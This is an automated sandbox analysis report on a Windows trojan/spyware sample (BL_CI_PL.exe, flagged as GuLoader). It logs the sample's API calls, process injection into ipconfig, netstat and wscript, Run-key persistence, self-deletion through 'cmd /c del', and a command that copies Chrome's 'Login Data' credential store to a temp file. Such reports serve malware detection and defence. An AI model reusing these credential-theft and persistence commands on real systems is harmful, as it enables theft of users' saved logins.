        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A529F0 NtReadFile,LdrInitializeThunk,29_2_04A529F0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52A80 NtClose,LdrInitializeThunk,29_2_04A52A80
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52AC0 NtEnumerateValueKey,LdrInitializeThunk,29_2_04A52AC0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52B80 NtCreateKey,LdrInitializeThunk,29_2_04A52B80
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52B90 NtFreeVirtualMemory,LdrInitializeThunk,29_2_04A52B90
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52BC0 NtQueryInformationToken,LdrInitializeThunk,29_2_04A52BC0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52B00 NtQueryValueKey,LdrInitializeThunk,29_2_04A52B00
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52B10 NtAllocateVirtualMemory,LdrInitializeThunk,29_2_04A52B10
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A534E0 NtCreateMutant,LdrInitializeThunk,29_2_04A534E0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A54570 NtSuspendThread,29_2_04A54570
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A54260 NtSetContextThread,29_2_04A54260
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52CF0 NtDelayExecution,29_2_04A52CF0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52CD0 NtEnumerateKey,29_2_04A52CD0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52C20 NtSetInformationFile,29_2_04A52C20
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52C10 NtOpenProcess,29_2_04A52C10
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52C50 NtUnmapViewOfSection,29_2_04A52C50
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52DA0 NtReadVirtualMemory,29_2_04A52DA0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52D50 NtWriteVirtualMemory,29_2_04A52D50
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52EB0 NtProtectVirtualMemory,29_2_04A52EB0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52E80 NtCreateProcessEx,29_2_04A52E80
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52EC0 NtQuerySection,29_2_04A52EC0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52ED0 NtResumeThread,29_2_04A52ED0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52E00 NtQueueApcThread,29_2_04A52E00
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52FB0 NtSetValueKey,29_2_04A52FB0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52F30 NtOpenDirectoryObject,29_2_04A52F30
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A529D0 NtWaitForSingleObject,29_2_04A529D0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52AA0 NtQueryInformationFile,29_2_04A52AA0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52A10 NtWriteFile,29_2_04A52A10
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52BE0 NtQueryVirtualMemory,29_2_04A52BE0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52B20 NtQueryInformationProcess,29_2_04A52B20
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A53C90 NtOpenThread,29_2_04A53C90
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A53C30 NtOpenProcessToken,29_2_04A53C30
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A538D0 NtGetContextThread,29_2_04A538D0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_007385E0 NtCreateFile,29_2_007385E0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_00738690 NtReadFile,29_2_00738690
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_00738710 NtClose,29_2_00738710
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_007387C0 NtAllocateVirtualMemory,29_2_007387C0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_0073868D NtReadFile,29_2_0073868D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_0073870A NtClose,29_2_0073870A
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_007387C2 NtAllocateVirtualMemory,29_2_007387C2
        Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess Stats: CPU usage > 98%
        Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 98%
        Source: C:\Windows\SysWOW64\wscript.exeProcess Stats: CPU usage > 98%
        Source: C:\Users\user\Desktop\BL_CI_PL.exeProcess Stats: CPU usage > 98%
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess Stats: CPU usage > 98%
        Source: BL_CI_PL.exe, 00000001.00000002.25495730315.0000000000423000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamegadehan.exe vs BL_CI_PL.exe
        Source: BL_CI_PL.exe, 0000000A.00000000.25490034616.0000000000423000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamegadehan.exe vs BL_CI_PL.exe
        Source: BL_CI_PL.exe, 0000000A.00000003.26181548267.0000000000950000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs BL_CI_PL.exe
        Source: BL_CI_PL.exe, 0000000A.00000002.26187450455.00000000000D7000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs BL_CI_PL.exe
        Source: BL_CI_PL.exe, 0000000A.00000003.26181599405.00000000008DE000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs BL_CI_PL.exe
        Source: BL_CI_PL.exe, 0000000A.00000002.26203454530.000000001EB50000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs BL_CI_PL.exe
        Source: BL_CI_PL.exe, 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs BL_CI_PL.exe
        Source: BL_CI_PL.exeBinary or memory string: OriginalFilenamegadehan.exe vs BL_CI_PL.exe
        Source: BL_CI_PL.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: k4n8p7lb.exe.13.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: C:\Users\user\Desktop\BL_CI_PL.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\BL_CI_PL.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeSection loaded: edgegdi.dll
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeSection loaded: edgegdi.dll
        Source: BL_CI_PL.exeVirustotal: Detection: 19%
        Source: BL_CI_PL.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\BL_CI_PL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\Desktop\BL_CI_PL.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\BL_CI_PL.exe "C:\Users\user\Desktop\BL_CI_PL.exe"
        Source: C:\Users\user\Desktop\BL_CI_PL.exeProcess created: C:\Users\user\Desktop\BL_CI_PL.exe "C:\Users\user\Desktop\BL_CI_PL.exe"
        Source: C:\Users\user\Desktop\BL_CI_PL.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\BL_CI_PL.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe"
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe"
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe"
        Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe"
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe"
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe"
        Source: C:\Users\user\Desktop\BL_CI_PL.exeProcess created: C:\Users\user\Desktop\BL_CI_PL.exe "C:\Users\user\Desktop\BL_CI_PL.exe" Jump to behavior
        Source: C:\Users\user\Desktop\BL_CI_PL.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exeJump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeJump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe" Jump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe" Jump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe" Jump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\BL_CI_PL.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /VJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe" Jump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe" Jump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe"
        Source: C:\Users\user\Desktop\BL_CI_PL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\BL_CI_PL.exeFile created: C:\Users\user\AppData\Local\Temp\~DF3A772AC6F37DE022.TMPJump to behavior
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@31/7@62/20
        Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5780:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:400:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:400:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5780:304:WilStaging_02
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\ipconfig.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: Binary string: ipconfig.pdb source: BL_CI_PL.exe, 0000000A.00000002.26187395930.00000000000D0000.00000040.00020000.sdmp, BL_CI_PL.exe, 0000000A.00000003.26181599405.00000000008DE000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.26181490143.000000000094A000.00000004.00000001.sdmp
        Source: Binary string: ipconfig.pdbGCTL source: BL_CI_PL.exe, 0000000A.00000002.26187395930.00000000000D0000.00000040.00020000.sdmp, BL_CI_PL.exe, 0000000A.00000003.26181599405.00000000008DE000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.26181490143.000000000094A000.00000004.00000001.sdmp
        Source: Binary string: netstat.pdbGCTL source: k4n8p7lb.exe, 0000001A.00000003.29294254487.0000000000804000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29298264719.0000000000090000.00000040.00020000.sdmp
        Source: Binary string: wscript.pdbGCTL source: k4n8p7lb.exe, 0000001B.00000003.29446027834.00000000007CC000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29464574091.000000001E820000.00000040.00020000.sdmp, k4n8p7lb.exe, 0000001B.00000003.29448067667.000000001E721000.00000004.00000001.sdmp
        Source: Binary string: netstat.pdb source: k4n8p7lb.exe, 0000001A.00000003.29294254487.0000000000804000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29298264719.0000000000090000.00000040.00020000.sdmp
        Source: Binary string: wntdll.pdbUGP source: BL_CI_PL.exe, 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp, ipconfig.exe, 0000000E.00000002.30166829665.0000000003B0D000.00000040.00000001.sdmp, ipconfig.exe, 0000000E.00000002.30165083413.00000000039E0000.00000040.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, NETSTAT.EXE, 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp, NETSTAT.EXE, 0000001C.00000003.29297520833.0000000002FC0000.00000004.00000001.sdmp, NETSTAT.EXE, 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, wscript.exe, 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, wscript.exe, 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp
        Source: Binary string: wntdll.pdb source: k4n8p7lb.exe, k4n8p7lb.exe, 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, NETSTAT.EXE, NETSTAT.EXE, 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp, NETSTAT.EXE, 0000001C.00000003.29297520833.0000000002FC0000.00000004.00000001.sdmp, NETSTAT.EXE, 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, wscript.exe, wscript.exe, 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, wscript.exe, 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp
        Source: Binary string: wscript.pdb source: k4n8p7lb.exe, 0000001B.00000003.29446027834.00000000007CC000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29464574091.000000001E820000.00000040.00020000.sdmp, k4n8p7lb.exe, 0000001B.00000003.29448067667.000000001E721000.00000004.00000001.sdmp

        Data Obfuscation:

        barindex
        Yara detected GuLoaderShow sources
        Source: Yara matchFile source: 0000001F.00000002.30058808750.0000000002380000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000000.25494294503.0000000000560000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000021.00000000.30054816737.0000000000560000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000020.00000002.30154748780.0000000000560000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.28964217531.0000000002BC0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000021.00000002.30154741238.0000000000560000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000002.29975987031.0000000002C20000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000000.28960622366.0000000000560000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.25496832496.0000000002B30000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.28872866748.0000000002A70000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000000.28869456297.0000000000560000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000020.00000000.29972117697.0000000000560000.00000040.00000001.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 1_2_00406C65 push ds; iretd 1_2_00406C90
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 1_2_0040A269 push 7816A1BAh; iretd 1_2_0040A281
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 1_2_0040980A pushfd ; ret 1_2_0040996E
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 1_2_0040A22B push 7816A1BAh; iretd 1_2_0040A281
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 1_2_00405B0A push ebx; iretd 1_2_00405B0B
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 1_2_02B30085 push esp; iretd 1_2_02B30086
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 1_2_02B300F2 push esp; iretd 1_2_02B300F3
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 1_2_02B32CC9 push esi; ret 1_2_02B32CE8
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 1_2_02B329F2 push eax; retf 1_2_02B329F4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 1_2_02B36BE7 push FFFFFF8Ah; retf 1_2_02B36C8D
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B08CD push ecx; mov dword ptr [esp], ecx10_2_1E8B08D6
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8897A1 push es; iretd 10_2_1E8897A8
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8821AD pushad ; retf 0004h10_2_1E88223F
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_005741B6 push edi; retf 10_2_005741B8
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_00574347 pushad ; retf 10_2_00574348
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_039E21AD pushad ; retf 0004h14_2_039E223F
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_039E97A1 push es; iretd 14_2_039E97A8
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A108CD push ecx; mov dword ptr [esp], ecx14_2_03A108D6
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_02F35640 push 6F0B6D34h; retf 14_2_02F35645
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_02F3B7D5 push eax; ret 14_2_02F3B828
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_02F3A7A6 push es; ret 14_2_02F3A757
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_02F35B77 push 6371F8CDh; retf 14_2_02F35B7C
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_02F35B58 push edx; iretd 14_2_02F35B64
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_02F3B88C push eax; ret 14_2_02F3B892
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_02F3B822 push eax; ret 14_2_02F3B828
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_02F3B82B push eax; ret 14_2_02F3B892
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_02F34E9C push 0D2B169Ah; retf 14_2_02F34EBD
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_02F3CCF6 push dword ptr [A92E284Ah]; ret 14_2_02F3CD17
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 23_2_02A70085 push esp; iretd 23_2_02A70086
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 23_2_02A700F2 push esp; iretd 23_2_02A700F3
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 23_2_02A72CC9 push esi; ret 23_2_02A72CE8

        Persistence and Installation Behavior:

        barindex
        Uses ipconfig to lookup or modify the Windows network settingsShow sources
        Source: C:\Users\user\Desktop\BL_CI_PL.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\T5jfdetbp\k4n8p7lb.exeJump to dropped file
        Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 24_2_000002062223C4B2 GetPrivateProfileSectionNamesW,GetPrivateProfileStringW,24_2_000002062223C4B2
        Source: C:\Windows\SysWOW64\NETSTAT.EXERegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FBF8U8LXCNJump to behavior
        Source: C:\Windows\SysWOW64\NETSTAT.EXERegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FBF8U8LXCNJump to behavior

        Hooking and other Techniques for Hiding and Protection:

        barindex
        Self deletion via cmd deleteShow sources
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: /c del "C:\Users\user\Desktop\BL_CI_PL.exe"
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: /c del "C:\Users\user\Desktop\BL_CI_PL.exe"Jump to behavior
        Source: C:\Users\user\Desktop\BL_CI_PL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\BL_CI_PL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\BL_CI_PL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
